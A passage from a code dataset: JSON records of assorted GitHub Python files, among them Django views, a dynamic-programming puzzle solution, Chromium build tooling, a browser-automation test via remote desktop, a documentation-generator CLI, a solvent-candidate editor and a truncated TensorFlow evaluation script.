path('/',views.update_note,name=\"updatenote\"),\n    path('/',views.update_data,name=\"updatedata\"),\n]\n","repo_name":"ernestfotseu/gamairoot-ce","sub_path":"gamairoot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"4499601953","text":"import sys\ninput = sys.stdin.readline\n\"\"\"\nBOJ 15486: Resignation 2 (퇴사 2)\n\nIt's DP.\nYes, it really is DP..\n\nResignation 1 caps n at 15, so brute force also works there;\nthis problem, Resignation 2, raises n up to 1,500,000.. so that only DP is feasible.\n\nThe gist of the problem:\nyou are given a sequence of N elements.\nEach element consists of two numbers, a and b.\nStarting from the first element, you can take one of the two actions below.\n\n1. Gain b points and add a to the index.\nIf adding a to the current index would exceed the maximum index, this action is not allowed.\n2. Skip this element and add 1 to the index. No points are gained.\nIn this way, find the maximum score you can have when you reach the last index.\n\"\"\"\nn = int(input())\narr = [list(map(int, input().split())) for _ in ' '*n]\ndp = [0]*(n+1)\nfor i in range(n):\n    # carry forward: the next index gets the larger of its current value and today's best\n    dp[i+1] = max(dp[i+1], dp[i])\n    if arr[i][0]+i > n: continue # if this is true, this consultation cannot fit within the limit\n    dp[i] += arr[i][1] # add this consultation's pay to the current dp value..\n    dp[i+arr[i][0]] = max(dp[i], dp[i+arr[i][0]]) # and keep the larger value at the next day available for consulting\nprint(max(dp)) # print the maximum of these\n","repo_name":"S-DPR/DSA","sub_path":"PS/Python/BJ_15486 (퇴사 2).py","file_name":"BJ_15486 (퇴사 2).py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}\n{"seq_id":"34924666719","text":"import sys\nsys.path.append('/home/xutun/transAs/src')\nfrom ttlib.basicInfo import bainfo\nfrom ttlib.basicInfo import calDis\nimport ttlib.geneStructure.nameServer as ns\nimport pandas as pd\nclass ep:\n    def __init__(self,line):\n        l = line.split('\\t')\n        self.ga = l[0]\n        self.ea = int(l[1])\n        self.pa = bainfo(l[2])\n        self.gb = l[3]\n        self.eb = int(l[4])\n        self.pb = bainfo(l[5])\n\n    def toStr(self):\n        return f'{self.ga}\\t{self.ea}\\t{self.gb}\\t{self.eb}'\n\n    def simplePrint(self):\n        print(self.ga,self.ea,self.gb,self.eb,sep='\\t')\n\n\nclass epPair:\n    def __init__(self,ep1,ep2):\n        self.ep1 = ep1\n        self.ep2 = ep2\n        self.disa = calDis(ep1.pa,ep2.pa)\n        self.disb = calDis(ep1.pb,ep2.pb)\n        self.diffDis = self.disa - self.disb\n        self.ena = self.ep1.ea - self.ep2.ea\n        self.enb = self.ep1.eb - self.ep2.eb\n        if self.ena < 0:\n            self.ena = -self.ena\n            self.enb = -self.enb\n        self.diffEn = self.ena - self.enb\n    def toStr(self):\n        return f'{self.ep1.ga}\\t{self.ep1.gb}\\t{self.ena}\\t{self.enb}\\t{self.diffEn}\\t{self.disa}\\t{self.disb}\\t{self.diffDis}\\t{self.ep1.ea}\\t{self.ep2.ea}\\t{self.ep1.eb}\\t{self.ep2.eb}'\n\nclass epChain:\n    def __init__(self,epList):\n        self.eps = epList\n\n    def geneAdjEpPair(self):\n        relList = []\n        for i in range(len(self.eps)-1):\n            relList.append(epPair(self.eps[i],self.eps[i+1]))\n        return relList\n\n    def toStr(self):\n        retStr = ''\n        for ep in self.eps:\n            retStr = retStr + ep.toStr() + '\\n'\n        return retStr\n\n    def print(self):\n        for ep in self.eps:\n            ep.simplePrint()\n\n","repo_name":"xjtu-omics/opium_poppy_isoseq","sub_path":"ttlib/geneStructure/dataStruct.py","file_name":"dataStruct.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}\n{"seq_id":"12793482665","text":"import argparse\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport zipfile\n\nfrom util import build_utils\nfrom util import jar_info_utils\n\n\ndef _FullJavaNameFromClassFilePath(path):\n  # Input: base/android/java/src/org/chromium/Foo.class\n  # Output: base.android.java.src.org.chromium.Foo\n  if not path.endswith('.class'):\n    return ''\n  path = os.path.splitext(path)[0]\n  parts = []\n  while path:\n    # Use split to be platform independent.\n    head, tail = os.path.split(path)\n    path = head\n    parts.append(tail)\n  parts.reverse() # Package comes first\n  return '.'.join(parts)\n\n\ndef _MergeInfoFiles(output, jar_paths):\n  \"\"\"Merge several .jar.info files to generate an .apk.jar.info.\n\n  Args:\n    output: output file path.\n    jar_paths: List of .jar file paths for the target apk.\n  \"\"\"\n  info_data = dict()\n  for jar_path in jar_paths:\n    # android_java_prebuilt adds jar files in the src directory (relative to\n    # the output directory, usually 
../../third_party/example.jar).\n # android_aar_prebuilt collects jar files in the aar file and uses the\n # java_prebuilt rule to generate gen/example/classes.jar files.\n # We scan these prebuilt jars to parse each class path for the FQN. This\n # allows us to later map these classes back to their respective src\n # directories.\n jar_info_path = jar_path + '.info'\n if os.path.exists(jar_info_path):\n info_data.update(jar_info_utils.ParseJarInfoFile(jar_path + '.info'))\n else:\n with zipfile.ZipFile(jar_path) as zip_info:\n for path in zip_info.namelist():\n fully_qualified_name = _FullJavaNameFromClassFilePath(path)\n if fully_qualified_name:\n info_data[fully_qualified_name] = jar_path\n\n jar_info_utils.WriteJarInfoFile(output, info_data)\n\n\ndef main(args):\n args = build_utils.ExpandFileArgs(args)\n parser = argparse.ArgumentParser(description=__doc__)\n build_utils.AddDepfileOption(parser)\n parser.add_argument('--output', required=True,\n help='Output .apk.jar.info file')\n parser.add_argument('--apk-jar-file', required=True,\n help='Path to main .jar file for this APK.')\n parser.add_argument('--dep-jar-files', required=True,\n help='GN-list of dependent .jar file paths')\n\n options = parser.parse_args(args)\n options.dep_jar_files = build_utils.ParseGnList(options.dep_jar_files)\n jar_files = [ options.apk_jar_file ] + options.dep_jar_files\n\n def _OnStaleMd5():\n with tempfile.NamedTemporaryFile() as tmp_file:\n _MergeInfoFiles(tmp_file.name, jar_files)\n shutil.move(tmp_file.name, options.output)\n tmp_file.delete = False\n\n build_utils.CallAndWriteDepfileIfStale(\n _OnStaleMd5, options,\n input_paths=jar_files,\n output_paths=[options.output])\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"kiwibrowser/src","sub_path":"build/android/gyp/merge_jar_info_files.py","file_name":"merge_jar_info_files.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"33882724724","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import News\nfrom django.core.paginator import Paginator\n\ndef listNews(request):\n allnews = News.objects.all()#[:3]\n paginator = Paginator(allnews, 2) # Show 21 contacts per page.\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n context = {\n 'page_obj': page_obj\n }\n return render(request, 'news/news.html', context)\n\ndef news_detail(request, news_id):\n detail = get_object_or_404(News, id=news_id)\n #detail = TouristAttraction.objects.get(id=id)\n return render(request, 'news/news_detail.html', context={'detail': detail})","repo_name":"husna0112/tourist_attraction","sub_path":"travel/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31810359658","text":"## Opereradores lógicos com IF/ELSE\n#nome = input(\"Qual o seu nome: \")\n\n#if \"Vitor\" != \"Vitor\":\n# print(\"Acertou!\")\n#else:\n# print(\"Errou!\")\n\n# Operador números\n#if 10 != 20:\n# print(\"Resultado caso verdadeiro\")\n#else:\n# print(\"Resultado caso falso\")\n\n\n# == Igualguade\n# != Diferença\n# > Maior que\n# < Menor que\n# >= Maior ou igual\n# <= Menor ou igual\n\nnome_1 = \"Vitor\"\nnome_2 = \"Italo\"\n\nnumero_1 = 10\nnumero_2 = 134.34\n\n# Operador and (todas condições iguais)\n#if ((nome_1 != nome_2) and (numero_1 == numero_2)):\n# print(True)\n#else:\n# 
print(False)\n\n# Operador or (pelo menos uma deve ser veradeira)\n# if ((nome_1 != nome_2) or (numero_1 == numero_2)):\n# print(True)\n# else:\n# print(False)\n\n# Estrutura IF/ELIF/ELSE\n# if nome_1 == nome_2:\n# print(10)\n# elif numero_1 == numero_2:\n# print(20)\n# else:\n# print(False)\n\n# Operadores juntos\n# if (nome_1 != nome_2 or numero_1 == numero_2) and numero_1 == numero_2:\n# print(True)\n# else:\n# print(False)\n\n\n## WHILE (cuidado com loops infinitos)\nnome = \"Gui\"\ntentativas = 3\n#while tentativas > 0:\n# nome = input(\"Qual o código: \")\n# tentativas = tentativas - 1\n\n## FOR\n#soma_letras = \"\"\n#for letra in \"Vitor\":\n# print(letra)\n# soma_letras += letra\n#\n#print(soma_letras)\n\n#soma_notas = 0\n#for nota in [1, 2, 3, 5, 6, 7, 8]:\n# print(nota)\n# soma_notas = soma_notas + nota\n#\n#print(soma_notas)\n\n## FOR + IF\ndef valida_nota(nota):\n if nota >= 8:\n return \"Gabaritou\"\n elif nota >=5:\n return \"Cabeçudo\"\n else:\n return \"Estude mais\"\n\ndef validacao_notas(lista_notas):\n retornos = []\n for nota in lista_notas:\n resposta = valida_nota(nota)\n retornos.append(resposta)\n\n# lista_notas_b1 = [1, 2, 3, 5, 6, 7, 8]\n# resultado_b1 = validacao_notas(lista_notas_b1)\n# print(resultado_b1)\n\n# lista_notas_b2 = [2, 3, 4, 6, 7, 8, 9]\n# resultado_b2 = validacao_notas(lista_notas_b2)\n# print(resultado_b2)\n\n#nota = 4\n#resultado = valida_nota(nota)\n#print(resultado)\n\n\n## Dicionários\nalunos = { \"aluno_1\": {\n \"nome\": \"Italo\",\n \"sobrenome\": \"Medeiros\",\n \"localizacao\": \"Ribeirão\",\n \"notas\": [1, 2, 3, 4, 5, 6, 7, 8],\n \"idade\": 23\n },\n \"aluno_2\": {\n \"nome\": \"Guilherme\",\n \"sobrenome\": \"Canechia\",\n \"localizacao\": \"SP\",\n \"notas\": [1, 2, 3, 4, 5, 6, 7, 8],\n \"idade\": 23\n },\n \"aluno_3\": {\n \"nome\": \"Ellen\",\n \"sobrenome\": \"Freitas\",\n \"localizacao\": {\n \"Cidade\": \"RJ\",\n \"Bairro\": \"Bangu\"\n },\n \"notas\": [1, 2, 3, 4, 5, 6, 7, 8],\n \"idade\": 23\n },\n}\n\n# for chave, valor in alunos.items():\n# for sub_chave, sub_valor in valor.items():\n# print(sub_chave)\n# print(sub_valor)\n# input()\n\nlista_nomes = []\nlista_notas = []\n\nfor chave in alunos:\n nome = alunos[chave][\"nome\"]\n print(\"Notas do aluno: \", nome)\n #lista_nomes.append(nome)\n\n for nota in alunos[chave][\"notas\"]:\n resultado = valida_nota(nota)\n print(nota, nota, nota, nota, nota , nota)\n #notas = alunos[chave][\"notas\"]\n #lista_notas.append(notas)\n input()\n","repo_name":"270469Jf/curso_python","sub_path":"arquivo02.py","file_name":"arquivo02.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7914056604","text":"\"\"\"The example uses browser_bot to launch Chromium and scarpy on the remote desktop.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Optional\n\nfrom libs.utils import preprocess_embeded_testweb as prepress\nfrom libs.utils import require_environ, vm_context\nfrom pyvirtualdisplay import Display\n\nlogger = logging.getLogger(__name__)\n\n# workaround for mouseinfo 初始化的时候DISPLAY未知或者无法连接\n# 1. 先start VirtualDisplay,再引入pyautogui/mouseinfo依赖的包\ndisp = Display(visible=False, size=(1440, 900), color_depth=24, use_xauth=True).start()\nfrom browser_guaca_screens import GuacaLoginScreen # noqa: E402\nfrom browser_guaca_screens import WindowsBrowserScreen # noqa: E402\nfrom libs.browser_bot import BrowserBot # noqa: E402\n\n# # 2. 
通过atexit.register注册关闭display的handler.\n# # 本module不会当成共用lib被其它modulee使用,所以不用这种方案\n\n# 2. 在__main__函数中try finally中关闭即可,见__main__\n\n\n@require_environ([\"TESTWEB\", \"GUACA_URL\", \"BROWSER_NAME\", \"GUACA_BROWSER\"])\n@vm_context(os.environ.get(\"VM_RESTAPI\"), os.environ.get(\"GUACA_BROWSER\"))\ndef test_windows_browser(screenshots: Optional[Path]) -> None:\n \"\"\"Test IE/Edge through remote desktop.\"\"\"\n browser_name = os.environ.get(\"BROWSER_NAME\")\n guaca_browser = guaca_user = os.environ.get(\"GUACA_BROWSER\")\n guaca = os.environ.get(\"GUACA_URL\")\n\n # Chrome doesn't honor policy PasswordManagerEnabled:false.\n # The Save Password bubble still show. Need to use --incognito.\n # Chromeium/FF is ok with policify file.\n # 注意:当使用incognito模式时,背景是黑色,ocr会有一定影响。\n # 故:推荐使用FF或者Chromium来测试Guacamole场景\n # extra_options = [\"--incognito\"] if browser_name == \"Chrome\" else None\n extra_options = None\n\n with BrowserBot.get(browser_name, extra_options).open(guaca) as browser:\n GuacaLoginScreen(browser).login(guaca_user, \"test\", 120, screenshots)\n with WindowsBrowserScreen.get(guaca_browser, browser).open(\n timeout=120, log_screenshot_folder=screenshots\n ) as win_browser:\n _test_action(win_browser, os.environ.get(\"TESTWEB\", \"\"), screenshots)\n logger.info(\"Done\")\n\n\ndef _test_action(\n action_browser: WindowsBrowserScreen, testweb: str, screenshots: Optional[Path]\n) -> None:\n \"\"\"在被测浏览器上面执行操作.\"\"\"\n action_browser.browser.click_and_send_keys(\n testweb,\n point=action_browser.adddress_bar,\n append_enter=True,\n clear_before=True,\n log_screenshot_folder=screenshots,\n )\n action_browser.browser.click_by_word(\n \"SetUserCookie\",\n confidence=0.5,\n timeout=60,\n preprocess=prepress,\n log_screenshot_folder=screenshots,\n )\n action_browser.browser.locate_word(\n \"AUTOMATED\",\n timeout=60,\n preprocess=prepress,\n )\n\n\nif __name__ == \"__main__\":\n _DEBUG = os.environ.get(\"DEBUG\", \"0\") == \"1\"\n logging.basicConfig(\n level=logging.DEBUG if _DEBUG else logging.INFO,\n format=\"%(asctime)s | %(name)s | %(levelname)s | %(lineno)d | %(message)s\",\n )\n _screenshoot_evn = os.environ.get(\"SCREENSHOTS_FOLDER\", None)\n screenshots = Path(_screenshoot_evn) if _screenshoot_evn and _DEBUG else None\n\n try:\n test_windows_browser(screenshots)\n finally:\n disp.stop()\n","repo_name":"liuliwh/bot_cllick","sub_path":"examples/test_browser_in_guca.py","file_name":"test_browser_in_guca.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17760626845","text":"import hashlib\n\nBUFFER_SIZE = 8000000 # 1 MB\n\n\ndef hash_file(path):\n \"\"\"\n Hashes the file using its first megabyte\n\n :param path: Full path of the file\n :type path: String\n :return: Hashed value in hexadecimal format\n :rtype: String\n \"\"\"\n md5 = hashlib.md5()\n with open(path, \"rb\") as file:\n data = file.read(BUFFER_SIZE)\n md5.update(data)\n return md5.hexdigest()\n","repo_name":"debrief/pepys-import","sub_path":"pepys_import/utils/datafile_utils.py","file_name":"datafile_utils.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"39109596646","text":"#!/usr/bin/env python3\nimport re\nimport time\nfrom datetime import datetime, timezone\n\nfrom cachecontrol import CacheControl\nfrom cachecontrol.caches import FileCache\nfrom cachecontrol.heuristics import LastModified\nfrom rdflib import 
Graph, URIRef, Literal, ConjunctiveGraph\nfrom rdflib.namespace import Namespace, DCTERMS, RDF\nfrom requests import Session\nfrom urllib.parse import urljoin\n\nfrom sqlobject import connectionForURI, sqlhub, SQLObject, StringCol, DateTimeCol, IntCol, EnumCol, RelatedJoin, \\\n    SQLObjectNotFound\n\nconnection = connectionForURI('mysql://solar:system@sqldb/stats?charset=utf8')\nsqlhub.processConnection = connection\n\nDCAT = Namespace('http://www.w3.org/ns/dcat#')\nGDP = Namespace('http://gss-data.org.uk/def/gdp#')\n\ns = CacheControl(Session(),\n                 cache=FileCache('.cache'),\n                 heuristic=LastModified())\n\norgs = {org['label']['value']: org['org']['value'] for org in s.post(\n    'https://staging.gss-data.org.uk/sparql',\n    headers={'Accept': 'application/sparql-results+json'},\n    data={'query': '''\nPREFIX org: <http://www.w3.org/ns/org#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nSELECT DISTINCT ?org ?label\nWHERE {\n    ?org a org:Organization ;\n        rdfs:label ?label .\n}'''}).json().get('results', {}).get('bindings', [])}\n\n\nclass Organisation(SQLObject):\n    class sqlmeta:\n        table = 'wh_organisation'\n    uri = StringCol(alternateID=True, length=255)\n    label = StringCol()\n    datasets = RelatedJoin('Dataset')\n\n\nclass Dataset(SQLObject):\n    class sqlmeta:\n        table = 'wh_dataset'\n    whitehall_id = IntCol(alternateID=True)\n    stats_type = EnumCol(enumValues=['Official Statistics', 'National Statistics', 'Statistical data set', None],\n                         default=None)\n    title = StringCol()\n    url = StringCol(alternateID=True, length=255)\n    orgs = RelatedJoin('Organisation')\n    publication_date = DateTimeCol()\n    government_name = StringCol()\n    collections = RelatedJoin('Collection')\n\n\nclass Collection(SQLObject):\n    class sqlmeta:\n        table = 'wh_collection'\n    uri = StringCol()\n    label = StringCol()\n    datasets = RelatedJoin('Dataset')\n\n\nOrganisation.createTable(ifNotExists=True)\nDataset.createTable(ifNotExists=True)\nCollection.createTable(ifNotExists=True)\n\n\nfor label, uri in orgs.items():\n    try:\n        org = Organisation.byUri(uri)\n        org.set(label=label)\n    except SQLObjectNotFound:\n        org = Organisation(uri=uri, label=label)\n\n# renamed from datasets_url_base: the crawl loop below reads and updates datasets_url\ndatasets_url = 'https://www.gov.uk/government/statistics.json'\ngov_uk_search = 'https://www.gov.uk/api/search.json'\n\ns = CacheControl(Session(),\n                 cache=FileCache('.cache'),\n                 heuristic=LastModified())\nstill_going = True\n\nabbr_re = re.compile(r'')\ncollection_re = re.compile(r'Part of a collection: <a href=\"([^\"]+)\">')  # href capture group restored for .group(1) below; the exact anchor markup is an assumption\n\n\ndef fetch_carefully(url):\n    tries = 0\n    holdoff = 5\n    while tries < 10:\n        resp = s.get(url)\n        if resp.status_code == 200:\n            try:\n                return resp.json()\n            except:\n                pass\n        time.sleep(holdoff)\n        tries = tries + 1\n        holdoff = holdoff * 2\n\n\nwhile still_going:\n\n    datasets = fetch_carefully(datasets_url)\n    fresh_datasets = False\n    for res_obj in datasets['results']:\n        res = res_obj['result']\n        publishers = []\n        issued = None\n        collection = None\n        orgs_list = res['organisations']\n\n        for label, uri in orgs.items():\n            if orgs_list.endswith(label) or \\\n                    f'title=\"{label}\"' in orgs_list or \\\n                    f'{label} and ' in orgs_list or \\\n                    f'{label}, ' in orgs_list:\n                publishers.append(Organisation.byUri(uri))\n        issued = datetime.fromisoformat(res['public_timestamp']).astimezone(timezone.utc)\n        if 'publication_collections' in res and res['publication_collections'] is not None:\n            coll_match = collection_re.match(res['publication_collections'])\n            if coll_match:\n                collection = coll_match.group(1)\n        landingPage = urljoin(datasets_url, res['url'])\n        try:\n            ds = Dataset.byUrl(landingPage)\n            if ds.publication_date != issued.replace(tzinfo=None) or 
set(publishers) != set(ds.orgs):\n fresh_datasets = True\n ds.set(\n whitehall_id=res['id'],\n stats_type=res['display_type'],\n title=res['title'],\n url=landingPage,\n publication_date=issued,\n government_name=res['government_name']\n )\n to_add = set(publishers) - set(ds.orgs)\n to_remove = set(ds.orgs) - set(publishers)\n for org in to_remove:\n ds.removeOrganisation(org)\n for org in to_add:\n ds.addOrganisation(org)\n except SQLObjectNotFound:\n fresh_datasets = True\n ds = Dataset(\n whitehall_id=res['id'],\n stats_type=res['display_type'],\n title=res['title'],\n url=landingPage,\n publication_date=issued,\n government_name=res['government_name']\n )\n for org in publishers:\n ds.addOrganisation(org)\n\n if fresh_datasets and 'next_page_url' in datasets:\n datasets_url = urljoin(datasets_url, datasets['next_page_url'])\n still_going = True\n else:\n still_going = False\n","repo_name":"GSS-Cogs/solar-system","sub_path":"registries/fetch_whitehall.py","file_name":"fetch_whitehall.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40995778741","text":"\"\"\"\nMain CLI entrypoint for `handsdown`.\n\"\"\"\nimport sys\nfrom typing import Type\n\nfrom handsdown.cli_parser import CLINamespace, parse_args\nfrom handsdown.constants import EXCLUDE_EXPRS, SOURCES_GLOB, Theme\nfrom handsdown.exceptions import GeneratorError\nfrom handsdown.generators.base import BaseGenerator\nfrom handsdown.generators.material import MaterialGenerator\nfrom handsdown.generators.rtd import RTDGenerator\nfrom handsdown.utils.logger import get_logger\nfrom handsdown.utils.path_finder import PathFinder\n\n\ndef select_generator_cls(theme: Theme) -> Type[BaseGenerator]:\n \"\"\"\n Select a generator based on the theme.\n \"\"\"\n return {\n Theme.RTD: RTDGenerator,\n Theme.MD: MaterialGenerator,\n }[theme]\n\n\ndef api(args: CLINamespace) -> None:\n path_finder = (\n PathFinder(args.input_path).exclude(*(EXCLUDE_EXPRS + args.exclude)).include(*args.include)\n )\n generator_cls = select_generator_cls(args.theme)\n\n generator = generator_cls(\n project_name=args.project_name,\n input_path=args.input_path,\n output_path=args.output_path,\n source_paths=path_finder.glob(SOURCES_GLOB),\n raise_errors=args.panic,\n source_code_url=args.get_source_code_url(),\n source_code_path=args.source_code_path,\n toc_depth=args.toc_depth,\n encoding=args.encoding,\n )\n if args.files:\n for path in args.files:\n generator.generate_doc(path)\n else:\n generator.generate_docs()\n generator.generate_index()\n if args.cleanup:\n generator.cleanup_old_docs()\n\n if args.create_configs:\n generator.generate_external_configs()\n\n\ndef main() -> None:\n \"\"\"\n Main entrypoint for CLI.\n \"\"\"\n args = parse_args(sys.argv[1:])\n logger = get_logger(level=args.log_level)\n\n try:\n api(args)\n except GeneratorError as e:\n logger.error(e)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vemel/handsdown","sub_path":"handsdown/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"52"} +{"seq_id":"72395548325","text":"\"\"\"\nsolv_pred_cand_edit inlcudes user iteractive functions to edit current candidate cas list\n\"\"\"\n\nimport solv_pred_valid_check as sp_vld_chk\nimport solv_pred_io as sp_io\nimport solv_pred_reg_txt as sp_rtxt\n\ndef remove_cas() -> list:\n \"\"\"return a user-specified cas list 
to be removed.\n \n Returns:\n list: user-specified cas to be removed.\n\n \"\"\"\n to_continue_rm_cas = True\n\n cas_to_remove = []\n\n # generate cas_to_remove list\n\n while to_continue_rm_cas:\n\n print(\"Do you want to remove any solvent? \\n\")\n remove_check = sp_io.continue_check()\n\n if remove_check == 1:\n\n cas_to_remove_usr = sp_io.input_cas()\n\n elif remove_check == 0:\n\n cas_to_remove_usr = []\n \n print('Continue? ')\n to_continue_rm_cas = sp_vld_chk.finish_check()\n\n else:\n\n cas_to_remove_usr = []\n sp_vld_chk.invalid_input()\n \n cas_to_remove += cas_to_remove_usr\n\n # check if the cas_to_remove list is empty\n\n if len(cas_to_remove) != 0:\n\n print('The following solvents will be removed: ')\n print(cas_to_remove)\n \n else:\n\n print('No solvent will be removed.')\n \n return cas_to_remove\n\n\ndef add_cas() -> list:\n \"\"\"Return list of additional user-specified candidate cas before submission.\n\n Returns:\n list: additional cas to be included.\n \"\"\"\n\n to_continue_add_cas = True\n\n cas_to_add = []\n\n while to_continue_add_cas:\n\n print(\"Do you want to add any solvent? \\n\")\n add_check = sp_io.continue_check()\n\n if add_check == 1:\n\n cas_to_add_usr = sp_io.input_cas()\n to_continue_add_cas = False\n\n elif add_check == 0:\n\n cas_to_add_usr = []\n print('Continue?')\n\n to_continue_add_cas = sp_vld_chk.finish_check()\n\n else:\n sp_vld_chk.invalid_input()\n \n cas_to_add += cas_to_add_usr\n\n \n if len(cas_to_add) != 0:\n\n print('The following solvents will be added: ')\n print(cas_to_add)\n \n else:\n \n print('No solvent will be added.')\n \n return cas_to_add\n\n\ndef edit_cand_cas_option(current_cand_cas_list: list, operation: str) -> list:\n \"\"\"Return confirmed candidate list before final submission.\n\n Args:\n current_cand_cas_list (list): current candidates cas\n operation (str): 'a' - add, 'rm' - remove, 'q' - quit, 'n' - not continue, 'v' - view current list\n\n Returns:\n list: edited candidate cas\n \"\"\"\n\n to_continue_ed_cas_opt = True\n\n crt_cand_cas_list = sp_vld_chk.rm_repeat(current_cand_cas_list)\n\n while to_continue_ed_cas_opt:\n \n if operation == 'n': # submit\n\n to_continue_ed_cas_opt = False\n\n elif operation == 'a': # add\n\n cas_to_add_list = add_cas()\n\n crt_cand_cas_list += cas_to_add_list\n crt_cand_cas_list = sp_vld_chk.rm_repeat(crt_cand_cas_list)\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n\n print('Current candidate list: ')\n print(crt_cand_cas_list)\n \n elif operation == 'rm': # remove\n \n cas_to_rm_list = remove_cas()\n\n crt_cand_cas_list = sp_vld_chk.rm_repeat(crt_cand_cas_list)\n\n after_filt = sp_vld_chk.can_be_removed_check(cas_to_rm_list, crt_cand_cas_list)\n\n crt_cand_cas_list = sp_vld_chk.rm_repeat(after_filt)\n\n if len(crt_cand_cas_list) == 0:\n\n print('Warning: No solvent candidate has been selected. 
Please add solvents.') # if the candidate has been emptied.\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n \n elif operation == 'v': # view current\n\n print('Current candidate list:')\n print(crt_cand_cas_list)\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n \n elif operation == 'q': # quit\n\n print('Confirm to quit SolvPred?')\n to_finish_ed_cand = sp_vld_chk.finish_check()\n\n if to_finish_ed_cand is True:\n\n exit()\n \n elif operation == 's': # submit\n\n print('Continue?')\n to_continue_ed_cas_opt = sp_vld_chk.finish_check()\n \n return crt_cand_cas_list\n\ndef edit_cand_list(current_cand_cas_list: list) -> list:\n \"\"\"return user updated candidate list\n\n Args:\n current_cand_cas_list (list): current candidate list\n\n Returns:\n list: user-updated candidated list\n \"\"\"\n\n to_continue_ed_cas_lst = True\n\n final_cand_list = sp_vld_chk.rm_repeat(current_cand_cas_list) # remove repeated cas entries from the candidate list\n\n while to_continue_ed_cas_lst:\n\n print('Submit?')\n submit_check = sp_io.continue_check() # submission check\n\n if submit_check == 1: # submit\n\n print('The following solvents will be considered as candidates: ')\n print(final_cand_list)\n\n to_continue_ed_cas_lst = False\n \n elif submit_check == 0:\n\n valid_how_to_edit_cand_list = ['a', 'rm', 'v', 's', 'q', 'add', 'remove', 'visualise', 'submit', 'quit'] # valid options to edit current candidate list\n\n how_to_edit_cand = sp_rtxt.rm_spc(str(input(\"Please select one of the following options: \\n[a] - add CAS \\n[rm] - remove CAS \\n[v] - visualise current candidate list\\n[s] - submit\\n[q] - quit\\n\" ))).lower() # ask users how do they want to modify the current candidate list\n\n if not sp_vld_chk.is_option_valid(valid_how_to_edit_cand_list, how_to_edit_cand):\n\n sp_vld_chk.invalid_input()\n edit_operation = 'n'\n \n elif how_to_edit_cand in ['a', 'add']:\n\n edit_operation = 'a'\n \n elif how_to_edit_cand in ['rm', 'remove']:\n\n edit_operation = 'rm'\n \n elif how_to_edit_cand in ['v', 'visualise']:\n\n edit_operation = 'v'\n \n elif how_to_edit_cand in ['s', 'submit']:\n\n edit_operation = 's'\n \n elif how_to_edit_cand in ['q', 'quit']:\n\n edit_operation = 'q'\n\n final_cand_list = edit_cand_cas_option(current_cand_cas_list, edit_operation)\n\n else:\n\n sp_vld_chk.invalid_input()\n \n return final_cand_list\n\n\n\n\n\n\n","repo_name":"xueannafang/hsp_toolkit_solv_pred_v_2.0","sub_path":"solv_pred_cand_edit.py","file_name":"solv_pred_cand_edit.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72429237605","text":"import tensorflow as tf\nslim = tf.contrib.slim\nfrom datasets import dataset_factory\nfrom nets import nets_factory\nfrom tensorflow.python.training.saver import latest_checkpoint\nfrom tensorflow.python.training.saver import Saver\nfrom tensorflow.python.training import supervisor\nfrom tensorflow import Session\nfrom tensorflow import ConfigProto\n\nimport time\nimport numpy as np\nimport scipy.io as sio\nimport cv2\n#train_dir = '/home/dmsl/nas/share/personal_lsh/training/cifar100/vanila/vgg13'\ntrain_dir = '/home/dmsl/Documents/tf/svd/teacher2'\ndataset_dir = '/home/dmsl/Documents/data/tf/cifar100'\ndataset_name = 'cifar10'\nmodel_name = 'vgg16'\nbatch_size = 200\ntf.logging.set_verbosity(tf.logging.INFO)\n\nwith tf.Graph().as_default():\n dataset = dataset_factory.get_dataset(dataset_name, 'test', 
